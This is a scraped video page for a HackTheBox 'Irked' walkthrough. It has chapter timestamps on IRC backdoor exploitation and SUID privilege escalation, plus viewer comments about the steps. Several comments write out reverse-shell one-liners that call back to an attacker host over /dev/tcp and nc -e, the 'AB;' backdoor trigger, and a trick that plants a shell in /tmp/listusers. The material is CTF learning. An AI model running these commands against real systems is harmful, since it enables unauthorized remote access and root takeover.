HackTheBox - Irked

แชร์
ฝัง
  • เผยแพร่เมื่อ 26 เม.ย. 2019
  • Last video was missing about 2 minutes and cut off at 31:35. Sorry, was an extremely busy week and didn't get to verify everything was good.
    00:39 - Begin on Recon
    01:39 - Starting a full nmap scan
    04:15 - Discovery of IRC
    04:35 - Manually looking at IRC
    06:00 - Looking at the IRC to understand how to connect to an IRC Server
    07:00 - Pulling the IRC Version and discovering the exploit
    08:50 - Going into the history of the IRC Backdoor
    09:45 - Manually exploiting the IRC Server
    13:10 - Shell returned on the server
    14:30 - Discovery of .backup which gives a steg password
    16:45 - Logging in with djmardov
    21:20 - Discovery of SetUID enabled custom binary, viewuser
    23:25 - Using ltrace to see what the binary does, executes the file /tmp/listusers
    23:50 - Getting a root shell
    25:50 - Testing exploiting the binary with "who", fails due to no setuid
    27:50 - Looking at the binary within Ghidra

ความคิดเห็น • 51

  • @RobertGallop
    @RobertGallop 5 ปีที่แล้ว +3

    Always the highlight of my Saturday. Thanks for another solid post!

  • @NullPxl
    @NullPxl 5 ปีที่แล้ว +3

    Thanks! Just finished watching the original video so great timing :P

  • @vladimirchudyk995
    @vladimirchudyk995 4 ปีที่แล้ว

    Awesome breakthrough and explanation!

  • @michaelfisher2821
    @michaelfisher2821 5 ปีที่แล้ว +1

    Thanks for the quality videos IppSec. Really like how clear you are with explaining the tools and methods you use. Just curious though, are you doing the boxes for the first time in your videos? Or are you solving them first, and the making the video?

  • @fatfrumos9292
    @fatfrumos9292 4 ปีที่แล้ว +1

    Hell IppSec, I am following you for a month and you amaze me every time...
    you know a lot of tools, paths, you are like a wiki in pen testing...
    The question is are you doing a course somewhere ? are you planing to do?
    Cheers
    Nice content, keep it up

  • @jarednorris2592
    @jarednorris2592 5 ปีที่แล้ว +2

    Thanks for doing beginner boxes as well as the difficult ones, I wonder why they included pass.txt in root?
    Maybe something to look into for further exploration :)

  • @mr.fakeman4718
    @mr.fakeman4718 5 ปีที่แล้ว +15

    I'm proud of myself that I know whats happening.
    Too bad I lost some points 'cause this box got retired.

    • @bbuggediffy
      @bbuggediffy 5 ปีที่แล้ว +2

      Me too. I'm a little pissed about that to be honest. It was a fine box and challenge, this one.

  • @bonesseben5682
    @bonesseben5682 3 ปีที่แล้ว +1

    Glad to see that ippsec is still human and can forget the order of # and ! at a bash file (-; cheers

  • @danialahmed01
    @danialahmed01 5 ปีที่แล้ว +2

    Thank you so much

  • @charlesreed6604
    @charlesreed6604 4 ปีที่แล้ว +2

    Love your videos, you rock! I'm curious too why the file being 2018 means it is interesting? I ran find / -perm -4000 2&>dev/null to get there, but didn't see why that one stood out versus any of the others. Thanks and keep up the great work!

    • @ippsec
      @ippsec  4 ปีที่แล้ว +1

      This box was retired April 2019 -- Generally boxes retire after 4-6 months, so it being created in 2018 meant it was created around the time the box was released.

  • @DaObvious1
    @DaObvious1 5 ปีที่แล้ว

    Is there a specific reason you're using ncat instead of nc? I know ncat is the nmap version and that the netcat openbsd version doesn't support the -e option but was wondering if there was a specific reason to use ncat instead of nc in this case. Maybe i missed something. Just curious. This was my first box ever on HTB and of course just like you said, I used MSF LOL! The manual way is awesome. Thanks for doing these videos. Keep up the great work!

    • @ippsec
      @ippsec  5 ปีที่แล้ว +4

      Both are the same on Kali I believe, no reason just what my mind went to

  • @Dobendanx
    @Dobendanx 5 ปีที่แล้ว +3

    Oh so this is how you were supposed to own the user, I got to root first via suid and just read it afterwards

  • @ivartorr1469
    @ivartorr1469 5 ปีที่แล้ว +1

    at 4:48 when you run nmap -sC -sV -p 8067 10.10.10.117 it returns the results displayed there, however, when I run mine - it takes a while for it to display any information and it doesnt display anything of value or even close to resemble yours. It says "Unable to open connection". However, I am connected to the server and HTB. Any idea as to why that is happening?

  • @TsukiCTF
    @TsukiCTF 5 ปีที่แล้ว +5

    Lol, I love that apple

  • @varunkumar6223
    @varunkumar6223 5 ปีที่แล้ว

    hello sir, thanks for such informative videos , i have a question i'm bit confused about services running on 139,445 can you suggest some machine where you exploited them , thanks once again.

  • @marcozufferli6080
    @marcozufferli6080 4 ปีที่แล้ว +1

    What's the difference between bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 and bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'? Why the last one works instead of the first?
    I don't understand the motivation about symbolik link

  • @redzaizudin6231
    @redzaizudin6231 5 ปีที่แล้ว +1

    ty

  • @wutangdaug
    @wutangdaug 4 ปีที่แล้ว

    Maybe it is a little too late, but for the /usr/bin/viewuser, when you try to exploit that " who" command, I modified like this:
    /bin/bash -p
    then it returned root, I also learned this from you :D

  • @winxlinx8636
    @winxlinx8636 5 ปีที่แล้ว +1

    at 10.25, what this command represents - echo "AB; ping -c 1 10.10.143.3" | ncat 10.10.10.117 8067 ?

  • @behnamanisi1
    @behnamanisi1 4 ปีที่แล้ว

    So i done something different... i created a reverse shell and placed it in /tmp/listusers... so when that listuser was ran by DJ account i got a connection back to my self as root..

  • @kab3800
    @kab3800 4 ปีที่แล้ว +1

    @IppSec at 22:15, how can we copy the binary without using base64 technique? can we copy it directly using nc or python? you mentioned that you don't remember the user's password, that's why you're bas63 encoding it. Didn't quite get you.

  • @JiyongShinful
    @JiyongShinful 5 ปีที่แล้ว +2

    Love your video as usual. Just one question I wanna drop here.. When I run echo "A; nc -e /bin/bash my IP 4444" | nc 10.10.10.117 8067 I am not able to receive a reverse shell and the only difference between your command and my command is just you using "echo "AB and me using "echo "A. Why would it make such a huge difference in result not being able to grab the shell?

    • @ippsec
      @ippsec  5 ปีที่แล้ว +5

      The backdoor is specifically looking for AB.

    • @JiyongShinful
      @JiyongShinful 5 ปีที่แล้ว

      Thanks for your answer Ippsec!

    • @servermadum7297
      @servermadum7297 11 หลายเดือนก่อน

      @@JiyongShinful @ippsec why specifically looking for the AB

  • @winxlinx8636
    @winxlinx8636 5 ปีที่แล้ว

    at 12. 43, any idea why it required to upgrade it to proper ttl ?

  • @jean-lucforsain9785
    @jean-lucforsain9785 4 ปีที่แล้ว +1

    Hello IppSec,
    At 12:20, I don't understand what is the difference between "bash -i ...." and "bash -c 'bash -i ....'".
    Why reverse shell doesn't work for the first command but works for the second one ?
    Can you explain this point please ?
    Regards,

    • @sjors3016
      @sjors3016 3 ปีที่แล้ว

      Yess, I am also wondering this myself. Not easy to search for this

  • @sid_cysec7323
    @sid_cysec7323 4 ปีที่แล้ว

    now here's the catch how the view file in suid is interesting and it's not a default file in debian i checked. But if we will go quickly overview how you went there that some juicy stuff is there in suid and that file is interesting.
    Just want to know the approch.

  • @ZerkerEOD
    @ZerkerEOD 5 ปีที่แล้ว +1

    Why do you just use nmap instead of masscan on boxes? I find doing masscan initially finds more ports faster for a specific nmap port scan later.

    • @ippsec
      @ippsec  5 ปีที่แล้ว +2

      Masscan can miss things

    • @ZerkerEOD
      @ZerkerEOD 5 ปีที่แล้ว

      Awesome, thanks for the reply! Still learning a lot and your videos are my go to if I can't figure something out.

  • @jefferyfan5506
    @jefferyfan5506 4 ปีที่แล้ว

    viewuser is running sh /tmp/listusers, so what i did is just add a a reverse shell to it and rooted. echo "reverseshell" > /tmp/listusers | chmod +x /tmp/listusers | viewuser Because i think the system clears /tmp after a period of dk how long

  • @tejasanerao1842
    @tejasanerao1842 3 ปีที่แล้ว

    24:02 And I thought I was the only one always confused about it😂

  • @sleexox
    @sleexox 2 ปีที่แล้ว

    Anyone knows what is the AB for in echo "AB; ?

  • @noyannyn891
    @noyannyn891 5 ปีที่แล้ว

    why can't I view the website and how fast do you scan nmap?

  • @ashutoshpanda4336
    @ashutoshpanda4336 5 ปีที่แล้ว +12

    Can you please make separate videos on RE .... I'm really week on that... Please make videos

    • @mr.fakeman4718
      @mr.fakeman4718 5 ปีที่แล้ว +2

      +1

    • @jigerjain
      @jigerjain 5 ปีที่แล้ว +2

      You could follow LiverOverflow he has already made some really good videos starting from basic tutorials on RE. Ippsec is great with HTB no doubt!

    • @ashutoshpanda4336
      @ashutoshpanda4336 5 ปีที่แล้ว +2

      @@jigerjain yeah I was going through the binary explaination series .... No doubt for ippsec.... He is awesome .....

  • @wearegettingdumber...2263
    @wearegettingdumber...2263 5 ปีที่แล้ว

    How are you entering copy mode and selecting the text and then saving to buffer? Please point me to the right place because the documentation is confusing as hell for us mortals..

    • @artemisheller4701
      @artemisheller4701 5 ปีที่แล้ว +1

      You mean in tmux? That would be 'C-b [' (or 'C-a [' in case you still have the default) to enter copy mode, then you move to the text you want, 'v' to start selecting, and 'y' to yank!

  • @FastMasuk
    @FastMasuk 5 ปีที่แล้ว

    Bash interpreter drops SUID permissions, since the script is owned by root, using #!/bin/dash should get a root shell with "who", didn't try this box so could be wrong, if you try it afterwards let me known if it worked

  • @utkarshagrawal851
    @utkarshagrawal851 5 ปีที่แล้ว

    I also use Netcat but I never use that type of functionality that you use. I mean How it works when you type User Pass in the netcat session. What does this functionality called in netcat? Anyone?

  • @stolzoffd9761
    @stolzoffd9761 5 ปีที่แล้ว

    Why is ghidra is better than cutter

    • @jarednorris2592
      @jarednorris2592 5 ปีที่แล้ว

      Cutter is just a UI for radare2.
      Don't get me wrong, I love radare2 and use it 90% of the time in its CLI version.
      But the devs of Cutter even said it was purpose built to be a beginner's intro to radare2 and not a full fledged tool to compete with binja, IDE, Ghidra, etc.

  • @striple765
    @striple765 5 ปีที่แล้ว

    First